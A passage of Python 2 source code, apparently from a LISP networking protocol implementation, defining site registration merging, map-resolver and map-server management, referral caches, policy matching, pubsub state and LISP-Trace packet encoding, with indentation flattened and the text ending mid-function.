self.registered = child.registered
self.proxy_reply_requested = child.proxy_reply_requested
self.lisp_sec_present = child.lisp_sec_present
self.xtr_id_present = child.xtr_id_present
self.use_register_ttl_requested = child.use_register_ttl_requested
self.merge_register_requested = child.merge_register_requested
self.mobile_node_requested = child.mobile_node_requested
self.map_notify_requested = child.map_notify_requested
#enddef
def build_sort_key(self):
sort_cache = lisp_cache()
ml, key = sort_cache.build_key(self.eid)
gkey = ""
if (self.group.is_null() == False):
gml, gkey = sort_cache.build_key(self.group)
gkey = "-" + gkey[0:12] + "-" + str(gml) + "-" + gkey[12::]
#endif
key = key[0:12] + "-" + str(ml) + "-" + key[12::] + gkey
del(sort_cache)
return(key)
#enddef
def merge_in_site_eid(self, child):
rle_changed = False
if (self.group.is_null()):
self.merge_rlocs_in_site_eid()
else:
rle_changed = self.merge_rles_in_site_eid()
#endif
#
# If a child registration was passed, copy some fields to the parent
# copy.
#
if (child != None):
self.copy_state_to_parent(child)
self.map_registers_received += 1
#endif
return(rle_changed)
#enddef
def copy_rloc_records(self):
new_list = []
for rloc_entry in self.registered_rlocs:
new_list.append(copy.deepcopy(rloc_entry))
#endfor
return(new_list)
#enddef
def merge_rlocs_in_site_eid(self):
self.registered_rlocs = []
for site_eid in self.individual_registrations.values():
if (self.site_id != site_eid.site_id): continue
if (site_eid.registered == False): continue
self.registered_rlocs += site_eid.copy_rloc_records()
#endfor
#
# Remove duplicate RLOC addresses if multiple ETRs registered with
# the same RTR-set.
#
new_list = []
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_null() or len(new_list) == 0):
new_list.append(rloc_entry)
continue
#endif
for re in new_list:
if (re.rloc.is_null()): continue
if (rloc_entry.rloc.is_exact_match(re.rloc)): break
#endfor
if (re == new_list[-1]): new_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_list
#
# Removal case.
#
if (len(self.registered_rlocs) == 0): self.registered = False
return
#enddef
def merge_rles_in_site_eid(self):
#
# Build temporary old list of RLE nodes in dictionary array.
#
old_rle = {}
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle == None): continue
for rle_node in rloc_entry.rle.rle_nodes:
addr = rle_node.address.print_address_no_iid()
old_rle[addr] = rle_node.address
#endfor
break
#endfor
#
# Merge in all RLOC entries of an RLOC-set.
#
self.merge_rlocs_in_site_eid()
#
# Remove RLEs that were added as RLOC-records in merge_rlocs_in_
# site_eid(). We only care about the first RLE that is the merged
# set of all the individual registered RLEs. We assume this appears
# first and that all subsequent RLOC-records are the RTR list for
# each registering ETR.
#
new_rloc_list = []
for rloc_entry in self.registered_rlocs:
if (self.registered_rlocs.index(rloc_entry) == 0):
new_rloc_list.append(rloc_entry)
continue
#endif
if (rloc_entry.rle == None): new_rloc_list.append(rloc_entry)
#endfor
self.registered_rlocs = new_rloc_list
#
# Merge RLEs from individuals into master copy and make a temporary
# new_rle list to compare with old_rle. If there is a RLOC-name for
# the RLE, clear it from the merged registration. We want names to
# be per RLE entry and not the RLOC record entry it resides in.
#
rle = lisp_rle("")
new_rle = {}
rloc_name = None
for site_eid in self.individual_registrations.values():
if (site_eid.registered == False): continue
irle = site_eid.registered_rlocs[0].rle
if (irle == None): continue
rloc_name = site_eid.registered_rlocs[0].rloc_name
for irle_node in irle.rle_nodes:
addr = irle_node.address.print_address_no_iid()
if (new_rle.has_key(addr)): break
rle_node = lisp_rle_node()
rle_node.address.copy_address(irle_node.address)
rle_node.level = irle_node.level
rle_node.rloc_name = rloc_name
rle.rle_nodes.append(rle_node)
new_rle[addr] = irle_node.address
#endfor
#endfor
#
# Store new copy.
#
if (len(rle.rle_nodes) == 0): rle = None
if (len(self.registered_rlocs) != 0):
self.registered_rlocs[0].rle = rle
if (rloc_name): self.registered_rlocs[0].rloc_name = None
#endif
#
# Check for changes.
#
if (old_rle.keys() == new_rle.keys()): return(False)
lprint("{} {} from {} to {}".format( \
green(self.print_eid_tuple(), False), bold("RLE change", False),
old_rle.keys(), new_rle.keys()))
return(True)
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.add_cache(self.eid, self)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None):
se = lisp_site_eid(self.site)
se.eid.copy_address(self.group)
se.group.copy_address(self.group)
lisp_sites_by_eid.add_cache(self.group, se)
#
# See lisp_site_eid_lookup() for special case details for
# longest match looks for (S,G) entries.
#
se.parent_for_more_specifics = self.parent_for_more_specifics
#endif
if (self.eid.is_null()): self.eid.make_default_route(se.group)
se.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_sites_by_eid.delete_cache(self.eid)
else:
se = lisp_sites_by_eid.lookup_cache(self.group, True)
if (se == None): return
site_eid = se.lookup_source_cache(self.eid, True)
if (site_eid == None): return
if (se.source_cache == None): return
se.source_cache.delete_cache(self.eid)
if (se.source_cache.cache_size() == 0):
lisp_sites_by_eid.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_se):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_se.eid, source_se)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
def eid_record_matches(self, eid_record):
if (self.eid.is_exact_match(eid_record.eid) == False): return(False)
if (eid_record.group.is_null()): return(True)
return(eid_record.group.is_exact_match(self.group))
#enddef
def inherit_from_ams_parent(self):
parent = self.parent_for_more_specifics
if (parent == None): return
self.force_proxy_reply = parent.force_proxy_reply
self.force_nat_proxy_reply = parent.force_nat_proxy_reply
self.force_ttl = parent.force_ttl
self.pitr_proxy_reply_drop = parent.pitr_proxy_reply_drop
self.proxy_reply_action = parent.proxy_reply_action
self.echo_nonce_capable = parent.echo_nonce_capable
self.policy = parent.policy
self.require_signature = parent.require_signature
#enddef
def rtrs_in_rloc_set(self):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rtr_in_rloc_set(self, rtr_rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rloc.is_exact_match(rtr_rloc) == False): continue
if (rloc_entry.is_rtr()): return(True)
#endfor
return(False)
#enddef
def is_rloc_in_rloc_set(self, rloc):
for rloc_entry in self.registered_rlocs:
if (rloc_entry.rle):
for rle in rloc_entry.rle.rle_nodes:
if (rle.address.is_exact_match(rloc)): return(True)
#endif
#endif
if (rloc_entry.rloc.is_exact_match(rloc)): return(True)
#endfor
return(False)
#enddef
def do_rloc_sets_match(self, prev_rloc_set):
if (len(self.registered_rlocs) != len(prev_rloc_set)): return(False)
for rloc_entry in prev_rloc_set:
old_rloc = rloc_entry.rloc
if (self.is_rloc_in_rloc_set(old_rloc) == False): return(False)
#endfor
return(True)
#enddef
#endclass
class lisp_mr():
def __init__(self, addr_str, dns_name, mr_name):
self.mr_name = mr_name if (mr_name != None) else "all"
self.dns_name = dns_name
self.map_resolver = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (addr_str):
self.map_resolver.store_address(addr_str)
self.insert_mr()
else:
self.resolve_dns_name()
#endif
self.last_used = 0
self.last_reply = 0
self.last_nonce = 0
self.map_requests_sent = 0
self.neg_map_replies_received = 0
self.total_rtt = 0
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no
# longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_mr()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_resolver.print_address_no_iid()):
self.delete_mr()
self.map_resolver.store_address(addr)
self.insert_mr()
#endif
#
# If this is a pull-based LISP-Decent DNS suffix, then create other
# lisp_mr() entries for all A-records. Only the master (A-record
# index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
mr = lisp_get_map_resolver(a, None)
if (mr != None and mr.a_record_index == a_records.index(addr)):
continue
#endif
mr = lisp_mr(addr, None, None)
mr.a_record_index = a_records.index(addr)
mr.dns_name = self.dns_name
mr.last_dns_resolve = lisp_get_timestamp()
#endfor
#
# Check for deletes.
#
delete_list = []
for mr in lisp_map_resolvers_list.values():
if (self.dns_name != mr.dns_name): continue
a = mr.map_resolver.print_address_no_iid()
if (a in a_records): continue
delete_list.append(mr)
#endfor
for mr in delete_list: mr.delete_mr()
#enddef
def insert_mr(self):
key = self.mr_name + self.map_resolver.print_address()
lisp_map_resolvers_list[key] = self
#enddef
def delete_mr(self):
key = self.mr_name + self.map_resolver.print_address()
if (lisp_map_resolvers_list.has_key(key) == False): return
lisp_map_resolvers_list.pop(key)
#enddef
#endclass
class lisp_ddt_root():
def __init__(self):
self.root_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.priority = 0
self.weight = 0
#enddef
#endclass
class lisp_referral():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_set = {}
self.referral_type = LISP_DDT_ACTION_NULL
self.referral_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.referral_ttl = 0
self.uptime = lisp_get_timestamp()
self.expires = 0
self.source_cache = None
#enddef
def print_referral(self, eid_indent, referral_indent):
uts = lisp_print_elapsed(self.uptime)
ets = lisp_print_future(self.expires)
lprint("{}Referral EID {}, uptime/expires {}/{}, {} referrals:". \
format(eid_indent, green(self.eid.print_prefix(), False), uts,
ets, len(self.referral_set)))
for ref_node in self.referral_set.values():
ref_node.print_ref_node(referral_indent)
#endfor
#enddef
def print_referral_type(self):
if (self.eid.afi == LISP_AFI_ULTIMATE_ROOT): return("root")
if (self.referral_type == LISP_DDT_ACTION_NULL):
return("null-referral")
#endif
if (self.referral_type == LISP_DDT_ACTION_SITE_NOT_FOUND):
return("no-site-action")
#endif
if (self.referral_type > LISP_DDT_ACTION_MAX):
return("invalid-action")
#endif
return(lisp_map_referral_action_string[self.referral_type])
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def print_ttl(self):
ttl = self.referral_ttl
if (ttl < 60): return(str(ttl) + " secs")
if ((ttl % 60) == 0):
ttl = str(ttl/60) + " mins"
else:
ttl = str(ttl) + " secs"
#endif
return(ttl)
#enddef
def is_referral_negative(self):
return (self.referral_type in \
(LISP_DDT_ACTION_MS_NOT_REG, LISP_DDT_ACTION_DELEGATION_HOLE,
LISP_DDT_ACTION_NOT_AUTH))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_referral_cache.add_cache(self.eid, self)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None):
ref = lisp_referral()
ref.eid.copy_address(self.group)
ref.group.copy_address(self.group)
lisp_referral_cache.add_cache(self.group, ref)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ref.group)
ref.add_source_entry(self)
#endif
#enddef
def delete_cache(self):
if (self.group.is_null()):
lisp_referral_cache.delete_cache(self.eid)
else:
ref = lisp_referral_cache.lookup_cache(self.group, True)
if (ref == None): return
sref = ref.lookup_source_cache(self.eid, True)
if (sref == None): return
ref.source_cache.delete_cache(self.eid)
if (ref.source_cache.cache_size() == 0):
lisp_referral_cache.delete_cache(self.group)
#endif
#endif
#enddef
def add_source_entry(self, source_ref):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ref.eid, source_ref)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
#endclass
class lisp_referral_node():
def __init__(self):
self.referral_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.priority = 0
self.weight = 0
self.updown = True
self.map_requests_sent = 0
self.no_responses = 0
self.uptime = lisp_get_timestamp()
#enddef
def print_ref_node(self, indent):
ts = lisp_print_elapsed(self.uptime)
lprint("{}referral {}, uptime {}, {}, priority/weight: {}/{}".format( \
indent, red(self.referral_address.print_address(), False), ts,
"up" if self.updown else "down", self.priority, self.weight))
#enddef
#endclass
class lisp_ms():
def __init__(self, addr_str, dns_name, ms_name, alg_id, key_id, pw, pr,
mr, rr, wmn, site_id, ekey_id, ekey):
self.ms_name = ms_name if (ms_name != None) else "all"
self.dns_name = dns_name
self.map_server = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.last_dns_resolve = None
self.a_record_index = 0
if (lisp_map_servers_list == {}):
self.xtr_id = lisp_get_control_nonce()
else:
self.xtr_id = lisp_map_servers_list.values()[0].xtr_id
#endif
self.alg_id = alg_id
self.key_id = key_id
self.password = pw
self.proxy_reply = pr
self.merge_registrations = mr
self.refresh_registrations = rr
self.want_map_notify = wmn
self.site_id = site_id
self.map_registers_sent = 0
self.map_registers_multicast_sent = 0
self.map_notifies_received = 0
self.map_notify_acks_sent = 0
self.ekey_id = ekey_id
self.ekey = ekey
if (addr_str):
self.map_server.store_address(addr_str)
self.insert_ms()
else:
self.resolve_dns_name()
#endif
#enddef
def resolve_dns_name(self):
if (self.dns_name == None): return
if (self.last_dns_resolve and
time.time() - self.last_dns_resolve < 30): return
try:
addresses = socket.gethostbyname_ex(self.dns_name)
self.last_dns_resolve = lisp_get_timestamp()
a_records = addresses[2]
except:
return
#endtry
#
# Check if the number of A-records has changed and this one is no
# longer valid.
#
if (len(a_records) <= self.a_record_index):
self.delete_ms()
return
#endif
addr = a_records[self.a_record_index]
if (addr != self.map_server.print_address_no_iid()):
self.delete_ms()
self.map_server.store_address(addr)
self.insert_ms()
#endif
#
# If this is a pull-based LISP-Decent DNS suffix, then create other
# lisp_ms() entries for all A-records. Only the master (A-record
# index 0) does this.
#
if (lisp_is_decent_dns_suffix(self.dns_name) == False): return
if (self.a_record_index != 0): return
for addr in a_records[1::]:
a = lisp_address(LISP_AFI_NONE, addr, 0, 0)
ms = lisp_get_map_server(a)
if (ms != None and ms.a_record_index == a_records.index(addr)):
continue
#endif
ms = copy.deepcopy(self)
ms.map_server.store_address(addr)
ms.a_record_index = a_records.index(addr)
ms.last_dns_resolve = lisp_get_timestamp()
ms.insert_ms()
#endfor
#
# Check for deletes.
#
delete_list = []
for ms in lisp_map_servers_list.values():
if (self.dns_name != ms.dns_name): continue
a = ms.map_server.print_address_no_iid()
if (a in a_records): continue
delete_list.append(ms)
#endfor
for ms in delete_list: ms.delete_ms()
#enddef
def insert_ms(self):
key = self.ms_name + self.map_server.print_address()
lisp_map_servers_list[key] = self
#enddef
def delete_ms(self):
key = self.ms_name + self.map_server.print_address()
if (lisp_map_servers_list.has_key(key) == False): return
lisp_map_servers_list.pop(key)
#enddef
#endclass
class lisp_interface():
def __init__(self, device):
self.interface_name = ""
self.device = device
self.instance_id = None
self.bridge_socket = None
self.raw_socket = None
self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dynamic_eid_device = None
self.dynamic_eid_timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
self.multi_tenant_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#enddef
def add_interface(self):
lisp_myinterfaces[self.device] = self
#enddef
def get_instance_id(self):
return(self.instance_id)
#enddef
def get_socket(self):
return(self.raw_socket)
#enddef
def get_bridge_socket(self):
return(self.bridge_socket)
#enddef
def does_dynamic_eid_match(self, eid):
if (self.dynamic_eid.is_null()): return(False)
return(eid.is_more_specific(self.dynamic_eid))
#enddef
def set_socket(self, device):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, device)
except:
s.close()
s = None
#endtry
self.raw_socket = s
#enddef
def set_bridge_socket(self, device):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
try:
s = s.bind((device, 0))
self.bridge_socket = s
except:
return
#endtry
#enddef
#endclass
class lisp_datetime():
def __init__(self, datetime_str):
self.datetime_name = datetime_str
self.datetime = None
self.parse_datetime()
#enddef
def valid_datetime(self):
ds = self.datetime_name
if (ds.find(":") == -1): return(False)
if (ds.find("-") == -1): return(False)
year, month, day, time = ds[0:4], ds[5:7], ds[8:10], ds[11::]
if ((year + month + day).isdigit() == False): return(False)
if (month < "01" and month > "12"): return(False)
if (day < "01" and day > "31"): return(False)
hour, mi, sec = time.split(":")
if ((hour + mi + sec).isdigit() == False): return(False)
if (hour < "00" and hour > "23"): return(False)
if (mi < "00" and mi > "59"): return(False)
if (sec < "00" and sec > "59"): return(False)
return(True)
#enddef
def parse_datetime(self):
dt = self.datetime_name
dt = dt.replace("-", "")
dt = dt.replace(":", "")
self.datetime = int(dt)
#enddef
def now(self):
ts = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
ts = lisp_datetime(ts)
return(ts)
#enddef
def print_datetime(self):
return(self.datetime_name)
#enddef
def future(self):
return(self.datetime > self.now().datetime)
#enddef
def past(self):
return(self.future() == False)
#enddef
def now_in_range(self, upper):
return(self.past() and upper.future())
#enddef
def this_year(self):
now = str(self.now().datetime)[0:4]
ts = str(self.datetime)[0:4]
return(ts == now)
#enddef
def this_month(self):
now = str(self.now().datetime)[0:6]
ts = str(self.datetime)[0:6]
return(ts == now)
#enddef
def today(self):
now = str(self.now().datetime)[0:8]
ts = str(self.datetime)[0:8]
return(ts == now)
#enddef
#endclass
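#
# Usage sketch for lisp_datetime (hypothetical values). Datetime strings
# use the format "YYYY-MM-DD-HH:MM:SS":
#
#   lower = lisp_datetime("2020-01-01-00:00:00")
#   upper = lisp_datetime("2020-12-31-23:59:59")
#   lower.now_in_range(upper)    # True only while "now" falls in 2020
#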
#
# Policy data structures.
#
class lisp_policy_match():
def __init__(self):
self.source_eid = None
self.dest_eid = None
self.source_rloc = None
self.dest_rloc = None
self.rloc_record_name = None
self.geo_name = None
self.elp_name = None
self.rle_name = None
self.json_name = None
self.datetime_lower = None
self.datetime_upper = None
#endclass
class lisp_policy():
def __init__(self, policy_name):
self.policy_name = policy_name
self.match_clauses = []
self.set_action = None
self.set_record_ttl = None
self.set_source_eid = None
self.set_dest_eid = None
self.set_rloc_address = None
self.set_rloc_record_name = None
self.set_geo_name = None
self.set_elp_name = None
self.set_rle_name = None
self.set_json_name = None
#enddef
def match_policy_map_request(self, mr, srloc):
for m in self.match_clauses:
p = m.source_eid
t = mr.source_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.dest_eid
t = mr.target_eid
if (p and t and t.is_more_specific(p) == False): continue
p = m.source_rloc
t = srloc
if (p and t and t.is_more_specific(p) == False): continue
l = m.datetime_lower
u = m.datetime_upper
if (l and u and l.now_in_range(u) == False): continue
return(True)
#endfor
return(False)
#enddef
def set_policy_map_reply(self):
all_none = (self.set_rloc_address == None and
self.set_rloc_record_name == None and self.set_geo_name == None and
self.set_elp_name == None and self.set_rle_name == None)
if (all_none): return(None)
rloc = lisp_rloc()
if (self.set_rloc_address):
rloc.rloc.copy_address(self.set_rloc_address)
addr = rloc.rloc.print_address_no_iid()
lprint("Policy set-rloc-address to {}".format(addr))
#endif
if (self.set_rloc_record_name):
rloc.rloc_name = self.set_rloc_record_name
name = blue(rloc.rloc_name, False)
lprint("Policy set-rloc-record-name to {}".format(name))
#endif
if (self.set_geo_name):
rloc.geo_name = self.set_geo_name
name = rloc.geo_name
not_found = "" if lisp_geo_list.has_key(name) else \
"(not configured)"
lprint("Policy set-geo-name '{}' {}".format(name, not_found))
#endif
if (self.set_elp_name):
rloc.elp_name = self.set_elp_name
name = rloc.elp_name
not_found = "" if lisp_elp_list.has_key(name) else \
"(not configured)"
lprint("Policy set-elp-name '{}' {}".format(name, not_found))
#endif
if (self.set_rle_name):
rloc.rle_name = self.set_rle_name
name = rloc.rle_name
not_found = "" if lisp_rle_list.has_key(name) else \
"(not configured)"
lprint("Policy set-rle-name '{}' {}".format(name, not_found))
#endif
if (self.set_json_name):
rloc.json_name = self.set_json_name
name = rloc.json_name
not_found = "" if lisp_json_list.has_key(name) else \
"(not configured)"
lprint("Policy set-json-name '{}' {}".format(name, not_found))
#endif
return(rloc)
#enddef
def save_policy(self):
lisp_policies[self.policy_name] = self
#enddef
#endclass
class lisp_pubsub():
def __init__(self, itr, port, nonce, ttl, xtr_id):
self.itr = itr
self.port = port
self.nonce = nonce
self.uptime = lisp_get_timestamp()
self.ttl = ttl
self.xtr_id = xtr_id
self.map_notify_count = 0
#enddef
def add(self, eid_prefix):
ttl = self.ttl
eid = eid_prefix.print_prefix()
if (lisp_pubsub_cache.has_key(eid) == False):
lisp_pubsub_cache[eid] = {}
#endif
pubsub = lisp_pubsub_cache[eid]
ar = "Add"
if (pubsub.has_key(self.xtr_id)):
ar = "Replace"
del(pubsub[self.xtr_id])
#endif
pubsub[self.xtr_id] = self
eid = green(eid, False)
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(ar, eid,
itr, xtr_id, ttl))
#enddef
def delete(self, eid_prefix):
eid = eid_prefix.print_prefix()
itr = red(self.itr.print_address_no_iid(), False)
xtr_id = "0x" + lisp_hex_string(self.xtr_id)
if (lisp_pubsub_cache.has_key(eid)):
pubsub = lisp_pubsub_cache[eid]
if (pubsub.has_key(self.xtr_id)):
pubsub.pop(self.xtr_id)
lprint("Remove pubsub state {} for {}, xtr-id: {}".format(eid,
itr, xtr_id))
#endif
#endif
#enddef
#endclass
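#
# Sketch of pubsub bookkeeping (hypothetical values): subscription state
# is stored per EID-prefix string, then per xTR-ID, so a second add()
# for the same (EID, xtr-id) pair replaces the earlier subscription:
#
#   ps = lisp_pubsub(itr, 4342, nonce, ttl, xtr_id)
#   ps.add(eid_prefix)       # stored in lisp_pubsub_cache[eid][xtr_id]
#   ps.delete(eid_prefix)    # removes only this xtr-id's entry
#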
#
# lisp_trace
#
# The LISP-Trace message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=9 | 0 | Local Private Port |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Local Private IPv4 RLOC |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_trace():
def __init__(self):
self.nonce = lisp_get_control_nonce()
self.packet_json = []
self.local_rloc = None
self.local_port = None
self.lisp_socket = None
#enddef
def print_trace(self):
jd = self.packet_json
lprint("LISP-Trace JSON: '{}'".format(jd))
#enddef
def encode(self):
first_long = socket.htonl(0x90000000)
packet = struct.pack("II", first_long, 0)
packet += struct.pack("Q", self.nonce)
packet += json.dumps(self.packet_json)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
if ((first_long & 0xff000000) != 0x90000000): return(False)
if (len(packet) < format_size): return(False)
addr = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
addr = socket.ntohl(addr)
v1 = addr >> 24
v2 = (addr >> 16) & 0xff
v3 = (addr >> 8) & 0xff
v4 = addr & 0xff
self.local_rloc = "{}.{}.{}.{}".format(v1, v2, v3, v4)
self.local_port = str(first_long & 0xffff)
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (len(packet) == 0): return(True)
try:
self.packet_json = json.loads(packet)
except:
return(False)
#endtry
return(True)
#enddef
def myeid(self, eid):
return(lisp_is_myeid(eid))
#enddef
def return_to_sender(self, lisp_socket, rts_rloc, packet):
rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
if (rloc == None):
rloc, port = rts_rloc.split(":")
port = int(port)
lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
else:
lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
port))
#endif
if (lisp_socket == None):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(("0.0.0.0", LISP_TRACE_PORT))
s.sendto(packet, (rloc, port))
s.close()
else:
lisp_socket.sendto(packet, (rloc, port))
#endif
#enddef
def packet_length(self):
udp = 8; trace = 4 + 4 + 8
return(udp + trace + len(json.dumps(self.packet_json)))
#enddef
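#
# Worked example for packet_length() (hypothetical values): the fixed
# overhead is 8 (UDP) + 4 + 4 + 8 = 24 bytes, so an empty packet_json
# (json.dumps([]) == "[]") yields 24 + 2 = 26 bytes.
#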
def rtr_cache_nat_trace(self, translated_rloc, translated_port):
key = self.local_rloc + ":" + self.local_port
value = (translated_rloc, translated_port)
lisp_rtr_nat_trace_cache[key] = value
lprint("Cache NAT Trace addresses {} -> {}".format(key, value))
#enddef
def rtr_cache_nat_trace_find(self, local_rloc_and_port):
key = local_rloc_and_port
try: value = lisp_rtr_nat_trace_cache[key]
except: value = (None, None)
return(value)
#enddef
#endclass
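#
# Round-trip sketch for lisp_trace (a minimal example, run in this
# module's context):
#
#   tr = lisp_trace()
#   pkt = tr.encode()       # type 9, zero RLOC/port, nonce, JSON body
#   rx = lisp_trace()
#   rx.decode(pkt)          # returns True; rx.nonce == tr.nonce and
#                           # rx.local_rloc decodes as "0.0.0.0"
#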
#------------------------------------------------------------------------------
#
# lisp_get_map_server
#
# Return a lisp_ms() class instance. Variable 'address' is a lisp_address()
# class instance.
#
def lisp_get_map_server(address):
for ms in lisp_map_servers_list.values():
if (ms.map_server.is_exact_match(address)): return(ms)
#endfor
return(None)
#enddef
#
# lisp_get_any_map_server
#
# Return the first lisp_ms() class instance.
#
def lisp_get_any_map_server():
for ms in lisp_map_servers_list.values(): return(ms)
return(None)
#enddef
#
# lisp_get_map_resolver
#
# Get least recently used Map-Resolver if address is not supplied. Variable
# 'eid' takes on 3 values, an EID value in the form of lisp_address(), None,
# or "". Value "" means to use any MR, like the first one. Value None means
# to use a map-resolver-name that has not been configured (i.e. "all").
#
def lisp_get_map_resolver(address, eid):
if (address != None):
addr = address.print_address()
mr = None
for key in lisp_map_resolvers_list:
if (key.find(addr) == -1): continue
mr = lisp_map_resolvers_list[key]
#endfor
return(mr)
#endif
#
# Get database-mapping entry to find out which map-resolver name set we
# should use, or pick one from a non-configured mr-name list. Or, get the
# first one for info-requests.
#
if (eid == ""):
mr_name = ""
elif (eid == None):
mr_name = "all"
else:
db = lisp_db_for_lookups.lookup_cache(eid, False)
mr_name = "all" if db == None else db.use_mr_name
#endif
older = None
for mr in lisp_map_resolvers_list.values():
if (mr_name == ""): return(mr)
if (mr.mr_name != mr_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
#
# lisp_get_decent_map_resolver
#
# Get the Map-Resolver based on the LISP-Decent pull mapping system lookup
# algorithm
#
def lisp_get_decent_map_resolver(eid):
index = lisp_get_decent_index(eid)
dns_name = str(index) + "." + lisp_decent_dns_suffix
lprint("Use LISP-Decent map-resolver {} for EID {}".format( \
bold(dns_name, False), eid.print_prefix()))
older = None
for mr in lisp_map_resolvers_list.values():
if (dns_name != mr.dns_name): continue
if (older == None or mr.last_used < older.last_used): older = mr
#endfor
return(older)
#enddef
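#
# Worked example (hypothetical suffix): if lisp_get_decent_index(eid)
# returns 5 and lisp_decent_dns_suffix is "pull.example.com", the lookup
# uses map-resolvers whose dns-name is "5.pull.example.com".
#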
#
# lisp_ipv4_input
#
# Process IPv4 data packet for input checking.
#
def lisp_ipv4_input(packet):
#
# Now calculate checksum for verification.
#
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum == 0):
dprint("Packet arrived with checksum of 0!")
else:
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
dprint("IPv4 header checksum failed for inner header")
packet = lisp_format_packet(packet[0:20])
dprint("Packet header: {}".format(packet))
return(None)
#endif
#endif
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[8:9])[0]
if (ttl == 0):
dprint("IPv4 packet arrived with ttl 0, packet discarded")
return(None)
elif (ttl == 1):
dprint("IPv4 packet {}, packet discarded".format( \
bold("ttl expiry", False)))
return(None)
#endif
ttl -= 1
packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
packet = lisp_ip_checksum(packet)
return(packet)
#enddef
#
# lisp_ipv6_input
#
# Process IPv6 data packet for input checking.
#
def lisp_ipv6_input(packet):
dest = packet.inner_dest
packet = packet.packet
#
# Now check TTL and if not 0, recalculate checksum and return to
# encapsulate.
#
ttl = struct.unpack("B", packet[7:8])[0]
if (ttl == 0):
